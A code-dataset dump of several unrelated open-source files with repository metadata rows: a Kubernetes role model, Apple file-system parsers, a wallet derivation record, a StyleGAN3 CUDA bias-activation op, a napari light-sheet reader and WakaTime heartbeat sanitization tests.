sha256='3ff6618a0acc9f0b9b4f6a62e7ff0f7bf538fb4f74de47ad04da1317408fcc15',
placement='nad'
)
# @6 appears to be the first version with dependencies
depends_on('pkgconfig@0.9.0:', type='build', when='@6:')
depends_on('sqlite@3.7:', when='@6:')
def configure_args(self):
return [
'PROJ_LIB={0}'.format(join_path(self.stage.source_path, 'nad'))
]
| 48.078431 | 95 | 0.748777 |
7954631ebc425d6b4034b6313f7deb3c29d19dd9 | 6,428 | py | Python | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
<<<<<<< HEAD
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
=======
OpenAPI spec version: v1.5.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
>>>>>>> release-1.0
"""
import pprint
import re # noqa: F401
import six
class V1alpha1Role(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'rules': 'list[V1alpha1PolicyRule]'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'rules': 'rules'
}
def __init__(self, api_version=None, kind=None, metadata=None, rules=None): # noqa: E501
"""V1alpha1Role - a model defined in OpenAPI""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._rules = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if rules is not None:
self.rules = rules
@property
def api_version(self):
"""Gets the api_version of this V1alpha1Role. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1alpha1Role. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1alpha1Role.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1alpha1Role. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1alpha1Role. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1alpha1Role. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1alpha1Role.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1alpha1Role. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1alpha1Role. # noqa: E501
:return: The metadata of this V1alpha1Role. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1alpha1Role.
:param metadata: The metadata of this V1alpha1Role. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def rules(self):
"""Gets the rules of this V1alpha1Role. # noqa: E501
Rules holds all the PolicyRules for this Role # noqa: E501
:return: The rules of this V1alpha1Role. # noqa: E501
:rtype: list[V1alpha1PolicyRule]
"""
return self._rules
@rules.setter
def rules(self, rules):
"""Sets the rules of this V1alpha1Role.
Rules holds all the PolicyRules for this Role # noqa: E501
:param rules: The rules of this V1alpha1Role. # noqa: E501
:type: list[V1alpha1PolicyRule]
"""
self._rules = rules
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1Role):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.665025 | 295 | 0.609365 |
795463357272c02290426801460f72f08f43a72f | 5,621 | py | Python | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 19 | 2017-05-02T03:43:28.000Z | 2022-02-09T22:22:33.000Z | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 19 | 2017-04-19T13:55:06.000Z | 2022-03-09T01:33:54.000Z | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 5 | 2017-06-04T15:39:02.000Z | 2022-03-04T22:19:37.000Z | #! /usr/bin/env python
"""Parser functions for Apple file systems"""
import xml.etree.ElementTree as ET
from . import byteconv as bc
from . import shared as shared
def parseZeroBlock(bytesData):
"""Parse Zero Block and return extracted properties"""
# Based on code at:
# https://opensource.apple.com/source/IOStorageFamily/IOStorageFamily-116/IOApplePartitionScheme.h
# Set up elemement object to store extracted properties
properties = ET.Element("appleZeroBlock")
shared.addProperty(properties, "signature",
bc.bytesToText(bytesData[0:2]))
shared.addProperty(properties, "blockSize",
bc.bytesToUShortInt(bytesData[2:4]))
shared.addProperty(properties, "blockCount",
bc.bytesToUInt(bytesData[4:8]))
shared.addProperty(properties, "deviceType",
bc.bytesToUShortInt(bytesData[8:10]))
shared.addProperty(properties, "deviceID",
bc.bytesToUShortInt(bytesData[10:12]))
shared.addProperty(properties, "driverData",
bc.bytesToUInt(bytesData[12:16]))
shared.addProperty(properties, "driverDescriptorCount",
bc.bytesToUShortInt(bytesData[80:82]))
shared.addProperty(properties, "driverDescriptorBlockStart",
bc.bytesToUInt(bytesData[82:86]))
shared.addProperty(properties, "driverDescriptorBlockCount",
bc.bytesToUShortInt(bytesData[86:88]))
shared.addProperty(properties, "driverDescriptorSystemType",
bc.bytesToUShortInt(bytesData[88:90]))
return properties
def parsePartitionMap(bytesData):
"""Parse Partition Map and return extracted properties"""
# Based on description at:
# https://en.wikipedia.org/wiki/Apple_Partition_Map#Layout
# and code at:
# https://opensource.apple.com/source/IOStorageFamily/IOStorageFamily-116/IOApplePartitionScheme.h
# Variable naming mostly follows Apple's code.
# Set up elemement object to store extracted properties
properties = ET.Element("applePartitionMap")
shared.addProperty(properties, "signature",
bc.bytesToText(bytesData[0:2]))
shared.addProperty(properties, "numberOfPartitionEntries",
bc.bytesToUInt(bytesData[4:8]))
shared.addProperty(properties, "partitionBlockStart",
bc.bytesToUInt(bytesData[8:12]))
shared.addProperty(properties, "partitionBlockCount",
bc.bytesToUInt(bytesData[12:16]))
shared.addProperty(properties, "partitionName",
bc.bytesToText(bytesData[16:48]))
shared.addProperty(properties, "partitionType",
bc.bytesToText(bytesData[48:80]))
shared.addProperty(properties, "partitionLogicalBlockStart",
bc.bytesToUInt(bytesData[80:84]))
shared.addProperty(properties, "partitionLogicalBlockCount",
bc.bytesToUInt(bytesData[84:88]))
shared.addProperty(properties, "partitionFlags",
bc.bytesToUInt(bytesData[88:92]))
shared.addProperty(properties, "bootCodeBlockStart",
bc.bytesToUInt(bytesData[92:96]))
shared.addProperty(properties, "bootCodeSizeInBytes",
bc.bytesToUInt(bytesData[96:100]))
shared.addProperty(properties, "bootCodeLoadAddress",
bc.bytesToUInt(bytesData[100:104]))
shared.addProperty(properties, "bootCodeJumpAddress",
bc.bytesToUInt(bytesData[108:112]))
shared.addProperty(properties, "bootCodeChecksum",
bc.bytesToUInt(bytesData[116:120]))
shared.addProperty(properties, "processorType",
bc.bytesToText(bytesData[120:136]))
return properties
def parseMasterDirectoryBlock(bytesData):
"""Parse Master Directory Block and return extracted properties"""
# Based on description at:
# https://developer.apple.com/legacy/library/documentation/mac/Files/Files-102.html
# and https://github.com/libyal/libfshfs/blob/master/documentation/Hierarchical%20File%20System%20(HFS).asciidoc
# Set up elemement object to store extracted properties
properties = ET.Element("masterDirectoryBlock")
shared.addProperty(properties, "signature",
bc.bytesToText(bytesData[0:2]))
shared.addProperty(properties, "blockSize",
bc.bytesToUShortInt(bytesData[18:20]))
shared.addProperty(properties, "blockCount",
bc.bytesToUInt(bytesData[20:24]))
charsVolumeName = bc.bytesToUnsignedChar(bytesData[36:37])
shared.addProperty(properties, "volumeName",
bc.bytesToText(bytesData[37:37 + charsVolumeName]))
return properties
def parseHFSPlusVolumeHeader(bytesData):
"""Parse HFS Plus Volume header and return extracted properties"""
# Based on https://opensource.apple.com/source/xnu/xnu-344/bsd/hfs/hfs_format.h
# Set up elemement object to store extracted properties
properties = ET.Element("hfsPlusVolumeheader")
shared.addProperty(properties, "signature",
bc.bytesToText(bytesData[0:2]))
shared.addProperty(properties, "version",
bc.bytesToUShortInt(bytesData[2:4]))
shared.addProperty(properties, "blockSize",
bc.bytesToUInt(bytesData[40:44]))
shared.addProperty(properties, "blockCount",
bc.bytesToUInt(bytesData[44:48]))
return properties
| 41.637037 | 116 | 0.66127 |
79546409653190e33990a9a45bfe0a7a0fd31a11 | 552 | py | Python | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 4 | 2021-12-05T11:36:17.000Z | 2022-02-19T09:30:02.000Z | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 15 | 2021-11-02T12:14:25.000Z | 2022-03-29T12:14:36.000Z | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 4 | 2021-11-21T02:11:34.000Z | 2022-03-15T08:37:47.000Z | from dataclasses import dataclass
from blspy import G1Element
from melon.types.blockchain_format.sized_bytes import bytes32
from melon.util.ints import uint32
from melon.wallet.util.wallet_types import WalletType
@dataclass(frozen=True)
class DerivationRecord:
"""
These are records representing a puzzle hash, which is generated from a
public key, derivation index, and wallet type. Stored in the puzzle_store.
"""
index: uint32
puzzle_hash: bytes32
pubkey: G1Element
wallet_type: WalletType
wallet_id: uint32
| 25.090909 | 78 | 0.768116 |
795464d0b4f16fb700bdd2ccf3ad18ce080a7195 | 9,418 | py | Python | thirdparty/stylegan3_ops/ops/bias_act.py | STomoya/animeface | 37b3cd26097d7874559d4c152e41e5712b7a1a42 | [
"MIT"
] | 61 | 2020-06-06T08:25:09.000Z | 2022-03-28T13:30:10.000Z | thirdparty/stylegan3_ops/ops/bias_act.py | OrigamiXx/animeface | 8724006df99ba7ef369e837d8294350ea733611b | [
"MIT"
] | 13 | 2020-07-02T02:41:14.000Z | 2021-05-09T14:24:58.000Z | thirdparty/stylegan3_ops/ops/bias_act.py | OrigamiXx/animeface | 8724006df99ba7ef369e837d8294350ea733611b | [
"MIT"
] | 8 | 2020-10-03T18:51:16.000Z | 2022-02-05T18:18:01.000Z | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
"""Custom PyTorch ops for efficient bias and activation."""
import os
import numpy as np
import torch
# import dnnlib
from utils import EasyDict
from .. import custom_ops
from .. import misc
#----------------------------------------------------------------------------
activation_funcs = {
'linear': EasyDict(func=lambda x, **_: x, def_alpha=0, def_gain=1, cuda_idx=1, ref='', has_2nd_grad=False),
'relu': EasyDict(func=lambda x, **_: torch.nn.functional.relu(x), def_alpha=0, def_gain=np.sqrt(2), cuda_idx=2, ref='y', has_2nd_grad=False),
'lrelu': EasyDict(func=lambda x, alpha, **_: torch.nn.functional.leaky_relu(x, alpha), def_alpha=0.2, def_gain=np.sqrt(2), cuda_idx=3, ref='y', has_2nd_grad=False),
'tanh': EasyDict(func=lambda x, **_: torch.tanh(x), def_alpha=0, def_gain=1, cuda_idx=4, ref='y', has_2nd_grad=True),
'sigmoid': EasyDict(func=lambda x, **_: torch.sigmoid(x), def_alpha=0, def_gain=1, cuda_idx=5, ref='y', has_2nd_grad=True),
'elu': EasyDict(func=lambda x, **_: torch.nn.functional.elu(x), def_alpha=0, def_gain=1, cuda_idx=6, ref='y', has_2nd_grad=True),
'selu': EasyDict(func=lambda x, **_: torch.nn.functional.selu(x), def_alpha=0, def_gain=1, cuda_idx=7, ref='y', has_2nd_grad=True),
'softplus': EasyDict(func=lambda x, **_: torch.nn.functional.softplus(x), def_alpha=0, def_gain=1, cuda_idx=8, ref='y', has_2nd_grad=True),
'swish': EasyDict(func=lambda x, **_: torch.sigmoid(x) * x, def_alpha=0, def_gain=np.sqrt(2), cuda_idx=9, ref='x', has_2nd_grad=True),
}
#----------------------------------------------------------------------------
_plugin = None
_null_tensor = torch.empty([0])
def _init():
global _plugin
if _plugin is None:
_plugin = custom_ops.get_plugin(
module_name='bias_act_plugin',
sources=['bias_act.cpp', 'bias_act.cu'],
headers=['bias_act.h'],
source_dir=os.path.dirname(__file__),
extra_cuda_cflags=['--use_fast_math'],
)
return True
#----------------------------------------------------------------------------
def bias_act(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None, impl='cuda'):
r"""Fused bias and activation function.
Adds bias `b` to activation tensor `x`, evaluates activation function `act`,
and scales the result by `gain`. Each of the steps is optional. In most cases,
the fused op is considerably more efficient than performing the same calculation
using standard PyTorch ops. It supports first and second order gradients,
but not third order gradients.
Args:
x: Input activation tensor. Can be of any shape.
b: Bias vector, or `None` to disable. Must be a 1D tensor of the same type
as `x`. The shape must be known, and it must match the dimension of `x`
corresponding to `dim`.
dim: The dimension in `x` corresponding to the elements of `b`.
The value of `dim` is ignored if `b` is not specified.
act: Name of the activation function to evaluate, or `"linear"` to disable.
Can be e.g. `"relu"`, `"lrelu"`, `"tanh"`, `"sigmoid"`, `"swish"`, etc.
See `activation_funcs` for a full list. `None` is not allowed.
alpha: Shape parameter for the activation function, or `None` to use the default.
gain: Scaling factor for the output tensor, or `None` to use default.
See `activation_funcs` for the default scaling of each activation function.
If unsure, consider specifying 1.
clamp: Clamp the output values to `[-clamp, +clamp]`, or `None` to disable
the clamping (default).
impl: Name of the implementation to use. Can be `"ref"` or `"cuda"` (default).
Returns:
Tensor of the same shape and datatype as `x`.
"""
assert isinstance(x, torch.Tensor)
assert impl in ['ref', 'cuda']
if impl == 'cuda' and x.device.type == 'cuda' and _init():
return _bias_act_cuda(dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp).apply(x, b)
return _bias_act_ref(x=x, b=b, dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp)
#----------------------------------------------------------------------------
@misc.profiled_function
def _bias_act_ref(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None):
"""Slow reference implementation of `bias_act()` using standard TensorFlow ops.
"""
assert isinstance(x, torch.Tensor)
assert clamp is None or clamp >= 0
spec = activation_funcs[act]
alpha = float(alpha if alpha is not None else spec.def_alpha)
gain = float(gain if gain is not None else spec.def_gain)
clamp = float(clamp if clamp is not None else -1)
# Add bias.
if b is not None:
assert isinstance(b, torch.Tensor) and b.ndim == 1
assert 0 <= dim < x.ndim
assert b.shape[0] == x.shape[dim]
x = x + b.reshape([-1 if i == dim else 1 for i in range(x.ndim)])
# Evaluate activation function.
alpha = float(alpha)
x = spec.func(x, alpha=alpha)
# Scale by gain.
gain = float(gain)
if gain != 1:
x = x * gain
# Clamp.
if clamp >= 0:
x = x.clamp(-clamp, clamp) # pylint: disable=invalid-unary-operand-type
return x
#----------------------------------------------------------------------------
_bias_act_cuda_cache = dict()
def _bias_act_cuda(dim=1, act='linear', alpha=None, gain=None, clamp=None):
"""Fast CUDA implementation of `bias_act()` using custom ops.
"""
# Parse arguments.
assert clamp is None or clamp >= 0
spec = activation_funcs[act]
alpha = float(alpha if alpha is not None else spec.def_alpha)
gain = float(gain if gain is not None else spec.def_gain)
clamp = float(clamp if clamp is not None else -1)
# Lookup from cache.
key = (dim, act, alpha, gain, clamp)
if key in _bias_act_cuda_cache:
return _bias_act_cuda_cache[key]
# Forward op.
class BiasActCuda(torch.autograd.Function):
@staticmethod
def forward(ctx, x, b): # pylint: disable=arguments-differ
ctx.memory_format = torch.channels_last if x.ndim > 2 and x.stride(1) == 1 else torch.contiguous_format
x = x.contiguous(memory_format=ctx.memory_format)
b = b.contiguous() if b is not None else _null_tensor
y = x
if act != 'linear' or gain != 1 or clamp >= 0 or b is not _null_tensor:
y = _plugin.bias_act(x, b, _null_tensor, _null_tensor, _null_tensor, 0, dim, spec.cuda_idx, alpha, gain, clamp)
ctx.save_for_backward(
x if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor,
b if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor,
y if 'y' in spec.ref else _null_tensor)
return y
@staticmethod
def backward(ctx, dy): # pylint: disable=arguments-differ
dy = dy.contiguous(memory_format=ctx.memory_format)
x, b, y = ctx.saved_tensors
dx = None
db = None
if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]:
dx = dy
if act != 'linear' or gain != 1 or clamp >= 0:
dx = BiasActCudaGrad.apply(dy, x, b, y)
if ctx.needs_input_grad[1]:
db = dx.sum([i for i in range(dx.ndim) if i != dim])
return dx, db
# Backward op.
class BiasActCudaGrad(torch.autograd.Function):
@staticmethod
def forward(ctx, dy, x, b, y): # pylint: disable=arguments-differ
ctx.memory_format = torch.channels_last if dy.ndim > 2 and dy.stride(1) == 1 else torch.contiguous_format
dx = _plugin.bias_act(dy, b, x, y, _null_tensor, 1, dim, spec.cuda_idx, alpha, gain, clamp)
ctx.save_for_backward(
dy if spec.has_2nd_grad else _null_tensor,
x, b, y)
return dx
@staticmethod
def backward(ctx, d_dx): # pylint: disable=arguments-differ
d_dx = d_dx.contiguous(memory_format=ctx.memory_format)
dy, x, b, y = ctx.saved_tensors
d_dy = None
d_x = None
d_b = None
d_y = None
if ctx.needs_input_grad[0]:
d_dy = BiasActCudaGrad.apply(d_dx, x, b, y)
if spec.has_2nd_grad and (ctx.needs_input_grad[1] or ctx.needs_input_grad[2]):
d_x = _plugin.bias_act(d_dx, b, x, y, dy, 2, dim, spec.cuda_idx, alpha, gain, clamp)
if spec.has_2nd_grad and ctx.needs_input_grad[2]:
d_b = d_x.sum([i for i in range(d_x.ndim) if i != dim])
return d_dy, d_x, d_b, d_y
# Add to cache.
_bias_act_cuda_cache[key] = BiasActCuda
return BiasActCuda
#----------------------------------------------------------------------------
| 45.941463 | 178 | 0.568061 |
795464e94c2f799c9fde2deae9ce33cbec59e935 | 5,967 | py | Python | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 7 | 2020-06-18T19:42:17.000Z | 2022-01-06T02:20:53.000Z | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 6 | 2020-09-10T17:15:18.000Z | 2022-01-20T21:22:45.000Z | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 3 | 2020-09-10T17:21:18.000Z | 2021-12-21T03:28:34.000Z | """Plugin to read lattice light sheet folders into napari."""
import glob
import logging
import os
import re
import zipfile
from contextlib import contextmanager
from typing import Any, Callable, Dict, List, Tuple, Union
import numpy as np
from dask import array as da
from dask import delayed
from tifffile import TiffFile, imread
from .affine import get_deskew_func
from .settingstxt import parse_settings
logger = logging.getLogger(__name__)
logging.getLogger("tifffile").setLevel(logging.CRITICAL)
LayerData = Union[Tuple[Any], Tuple[Any, Dict], Tuple[Any, Dict, str]]
PathLike = Union[str, List[str]]
ReaderFunction = Callable[[PathLike], List[LayerData]]
# this dict holds any overrides parameter overrides that the user wants
OVERRIDES: Dict[str, Any] = {}
@contextmanager
def parameter_override(**kwargs):
global OVERRIDES
old = OVERRIDES.copy()
OVERRIDES.update(kwargs)
yield
OVERRIDES = old
lls_pattern = re.compile(
r"""
^(?![_.]) # don't start with _ or .
.*
_ch(?P<channel>\d{1})
_stack(?P<stack>\d{4})
_(?P<wave>[^_]+)
_(?P<reltime>\d{7})msec
_.*\.tiff?$""", # ends with tif or tiff
re.VERBOSE,
)
read_counter = 0
def noisy_imread(path, in_zip=None):
# to see, set: logging.getLogger("napari_ndtiffs").setLevel(logging.DEBUG)
global read_counter
read_counter += 1
logger.debug(f"reading {path}, (read count: {read_counter})")
if in_zip:
with zipfile.ZipFile(in_zip) as zf:
with zf.open(path, "r") as f:
return imread(f)
return imread(path)
lazy_imread = delayed(noisy_imread) # lazy reader
def alphanumeric_key(s):
k = [int(c) if c.isdigit() else c for c in re.split("([0-9]+)", s)]
return k
def has_lls_data(path):
path = os.path.abspath(path)
if zipfile.is_zipfile(path):
with zipfile.ZipFile(path) as zf:
filelist = zf.namelist()
elif os.path.isdir(path):
filelist = os.listdir(path)
else:
return False
for fname in filelist:
if fname.endswith((".tif", ".tiff")):
match = lls_pattern.match(fname)
if match:
gdict = match.groupdict()
if gdict.get("channel") and gdict.get("stack"):
return True
return False
def get_tiff_meta(
path: str, in_zip: str = None
) -> Tuple[Tuple[int, int], np.dtype, float, float, Tuple[int, int]]:
dx, dz = 1.0, 1.0
if in_zip:
with zipfile.ZipFile(in_zip) as zf:
with zf.open(path, "r") as f:
return get_tiff_meta(f)
with TiffFile(path) as tfile:
nz = len(tfile.pages)
if not nz:
raise ValueError(f"tiff file {path} has no pages!")
first_page = tfile.pages[0]
shape = (nz,) + first_page.shape
dtype = first_page.dtype
_dx = first_page.tags.get("XResolution")
if hasattr(_dx, "value"):
dx = 1 / np.divide(*_dx.value)
desc = first_page.tags.get("ImageDescription")
if hasattr(desc, "value"):
match = re.search(r"spacing=([\d\.]+)", desc.value)
if match:
dz = float(match.groups()[0])
sample = tfile.asarray(key=(nz // 4, nz // 2, 3 * nz // 4))
clims = sample.min(), sample.max()
return shape, dtype, dx, dz, clims
def reader_function(path: PathLike) -> List[LayerData]:
"""Take a path or list of paths and return a list of LayerData tuples."""
try:
settings = parse_settings(path)
except FileNotFoundError:
settings = {}
in_zip = str(path) if zipfile.is_zipfile(path) else None
channels = dict()
if in_zip:
with zipfile.ZipFile(path) as zf:
filelist = zf.namelist()
else:
filelist = glob.glob(os.path.join(path, "*.tif"))
for fname in filelist:
match = lls_pattern.match(fname)
if match:
gdict = match.groupdict()
if gdict.get("channel") not in channels:
channels[gdict.get("channel")] = (gdict.get("wave"), [])
channels[gdict.get("channel")][1].append(fname)
data = []
names = []
clims = []
for i in sorted(channels.keys()):
wave, filenames = channels[i]
names.append(wave)
shape, dtype, dx, dz, clims_ = get_tiff_meta(filenames[0], in_zip=in_zip)
clims.append(clims_)
lazy_arrays = [lazy_imread(fn, in_zip=in_zip) for fn in sorted(filenames)]
dask_arrays = [
da.from_delayed(delayed_reader, shape=shape, dtype=dtype)
for delayed_reader in lazy_arrays
]
stack = da.stack(dask_arrays, axis=0)
data.append(stack)
data = da.stack(data)
dx = OVERRIDES.get("dx") or dx
dz = OVERRIDES.get("dz") or dz
dzdx_ratio = dz / dx
if (
settings.get("params", {}).get("samplescan", False) or OVERRIDES.get("angle")
) and OVERRIDES.get("deskew", True):
# if the image is the same size or smaller than the Settings.txt file, we deskew
angle = OVERRIDES.get("angle")
if angle is None:
angle = settings["params"]["angle"]
if shape[-1] <= settings["params"]["ny"] and angle > 0:
deskew_func, new_shape, dzdx_ratio = get_deskew_func(
data.shape,
dx=OVERRIDES.get("dx") or settings["params"]["dx"],
dz=OVERRIDES.get("dz") or settings["params"]["dz"],
angle=angle,
padval=OVERRIDES.get("padval") or 0,
)
data = data.map_blocks(deskew_func, dtype="float32", chunks=new_shape)
meta = {
"channel_axis": 0,
"scale": (1, dzdx_ratio, 1, 1),
"multiscale": False,
"contrast_limits": OVERRIDES.get("contrast_limits") or clims,
"name": OVERRIDES.get("name") or names,
}
if settings:
meta["metadata"] = settings
return [(data, meta)]
| 30.443878 | 88 | 0.597285 |
7954656b8354d0dffe0e7b179719c763c42b14da | 5,850 | py | Python | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | 1 | 2021-05-13T21:13:27.000Z | 2021-05-13T21:13:27.000Z | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | null | null | null | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from wakatime.heartbeat import Heartbeat
import os
import logging
from testfixtures import log_capture
from .utils import DynamicIterable, TestCase, mock
class HeartbeatTestCase(TestCase):
@log_capture()
def test_sanitize_removes_sensitive_data(self, logs):
logging.disable(logging.NOTSET)
class Args(object):
exclude = []
hide_file_names = ['.*']
hide_project_names = []
hide_branch_names = None
include = []
plugin = None
include_only_with_project_file = None
local_file = None
data = {
'entity': os.path.realpath('tests/samples/codefiles/python.py'),
'type': 'file',
'project': 'aproject',
'branch': 'abranch',
}
heartbeat = Heartbeat(data, Args(), None)
sanitized = heartbeat.sanitize()
self.assertEquals('HIDDEN.py', sanitized.entity)
sensitive = [
'branch',
'dependencies',
'lines',
'lineno',
'cursorpos',
]
for item in sensitive:
self.assertIsNone(getattr(sanitized, item))
self.assertNothingPrinted()
self.assertNothingLogged(logs)
@log_capture()
def test_sanitize_removes_sensitive_data_but_still_shows_branch(self, logs):
logging.disable(logging.NOTSET)
class Args(object):
exclude = []
hide_file_names = ['.*']
hide_project_names = []
hide_branch_names = []
include = []
plugin = None
include_only_with_project_file = None
local_file = None
data = {
'entity': os.path.realpath('tests/samples/codefiles/python.py'),
'type': 'file',
'project': 'aproject',
'branch': 'abranch',
}
heartbeat = Heartbeat(data, Args(), None, _clone=True)
sanitized = heartbeat.sanitize()
self.assertEquals('HIDDEN.py', sanitized.entity)
self.assertEquals('abranch', sanitized.branch)
self.assertEquals('aproject', sanitized.project)
sensitive = [
'dependencies',
'lines',
'lineno',
'cursorpos',
]
for item in sensitive:
self.assertIsNone(getattr(sanitized, item))
self.assertNothingPrinted()
self.assertNothingLogged(logs)
@log_capture()
def test_sanitize_does_nothing_when_hidefilenames_false(self, logs):
logging.disable(logging.NOTSET)
class Args(object):
exclude = []
hide_file_names = []
hide_project_names = []
hide_branch_names = None
include = []
plugin = None
include_only_with_project_file = None
local_file = None
data = {
'entity': os.path.realpath('tests/samples/codefiles/python.py'),
'type': 'file',
'project': 'aproject',
'branch': 'abranch',
}
heartbeat = Heartbeat(data, Args(), None)
heartbeat.branch = data['branch']
sanitized = heartbeat.sanitize()
self.assertEquals(data['branch'], sanitized.branch)
self.assertNothingPrinted()
self.assertNothingLogged(logs)
@log_capture()
def test_sanitize_does_nothing_when_missing_entity(self, logs):
logging.disable(logging.NOTSET)
class Args(object):
hide_file_names = ['.*']
hide_project_names = []
hide_branch_names = None
plugin = None
branch = 'abc123'
data = {
'entity': None,
'type': 'file',
'branch': branch,
}
heartbeat = Heartbeat(data, Args(), None, _clone=True)
sanitized = heartbeat.sanitize()
self.assertEquals(branch, sanitized.branch)
self.assertNothingPrinted()
self.assertNothingLogged(logs)
@log_capture()
def test_sanitize_does_nothing_when_type_not_file(self, logs):
logging.disable(logging.NOTSET)
class Args(object):
hide_file_names = ['.*']
hide_project_names = []
hide_branch_names = None
plugin = None
branch = 'abc123'
data = {
'entity': 'not.a.file',
'type': 'app',
'branch': branch,
}
heartbeat = Heartbeat(data, Args(), None, _clone=True)
sanitized = heartbeat.sanitize()
self.assertEquals(branch, sanitized.branch)
self.assertNothingPrinted()
self.assertNothingLogged(logs)
def test_parsing(self):
class Args(object):
hide_file_names = ['.*']
hide_project_names = []
hide_branch_names = None
plugin = None
samples = [
('v1', 'C:\\v1\\file.txt', '\\\\vboxsrv\\Projects\\v1\\file.txt'),
('v2', 'D:\\stuff\\v2\\file.py', '\\\\192.0.0.1\\work\\stuff\\v2\\file.py'),
]
for sample, filepath, expected in samples:
with mock.patch('wakatime.heartbeat.Popen') as mock_popen:
class MockCommunicate(object):
pass
stdout = open('tests/samples/netuse/' + sample).read()
mock_communicate = MockCommunicate()
mock_communicate.communicate = mock.MagicMock(return_value=DynamicIterable((stdout, ''), max_calls=1))
mock_popen.return_value = mock_communicate
heartbeat = Heartbeat({'user_agent': 'test'}, Args(), None, _clone=True)
result = heartbeat._to_unc_path(filepath)
self.assertEquals(expected, result)
